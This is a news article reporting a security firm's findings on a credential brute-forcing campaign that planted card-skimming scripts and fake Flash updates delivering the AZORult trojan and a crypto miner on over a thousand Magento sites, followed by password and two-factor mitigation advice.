Crypto-Mining & Card-Stealing Malware Infecting Magento Sites

Over a thousand shops and websites using Magento have been infected with malware that steals credit card information and runs cryptocurrency mining software.

The administrative panel Magento currently boasts two versions: a free and open-source one, and an enterprise option that offers support and whose sole maintainer is Magento.

Over a thousand shops and e-commerce sites that run Magento have been targeted by cyber attacks, threat-assessment site Flashpoint states in their report. Flashpoint goes on to say that these attacks have gone “unabated”, and interests for the platform on the Dark Web has been observable since 2016. Furthermore, the site’s analysts indicate that there may be even more websites at risk and that other Content Management Systems (CMS), such as OpenCart and Powerfront, are targeted as well. Flashpoint notes that the victims are primarily workers in the healthcare and education industries, and most of the targets’ IPs are clustered in Europe and the United States.

The Hackers’ Method

The hackers set up scripts perform a series of brute-force attacks on the targeted sites. These brute-force attacks utilize commonly used and default Magento credential information. As per Flashpoint’s report, these attacks are most successful when users do not change the passwords after the first log-in onto the platform.

Once the hackers have gained access to the CMS, they are able to add scripts of any nature they wish. In these cases, the code that the hackers injected into the program allows them access to pages that process payment information. Then, POST requests coming from the servers that contain sensitive information are then redirected to the hacker.

Upon visiting an exposed site, the end user is offered a fake update to Adobe Flash Player. If the malicious link is clicked, the script then installs malware from the attacker’s repositories, which are often stored on websites like GitHub. One such potentially installed malware is the trojan AZORult, which not only mines and stores data, but also downloads a cryptocurrency miner for Rarog.

Unfortunately, hackers have successfully stayed under the radar since 2016 due to the fact that they provide their malware with daily updates. This practice allows them to avoid detection software, as these function based on signature and behavior patterns.

Mitigating Measures

Flashpoint is working together with law enforcement to warn victims of the dangers they have been exposed to. Moreover, threat-assessment analysts suggest a series of steps to improve “password-hygiene” and to minimize the negative outcome of these attacks. They advise companies to set up requirements for complex passwords, while also strongly discouraging employees from reusing old passwords. Two-factor authentication, especially for sensitive databases and systems, has also been proposed.

While a patch to improve Magento’s security is highly desirable at this point, the developers have not yet released a statement for such plans.


Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.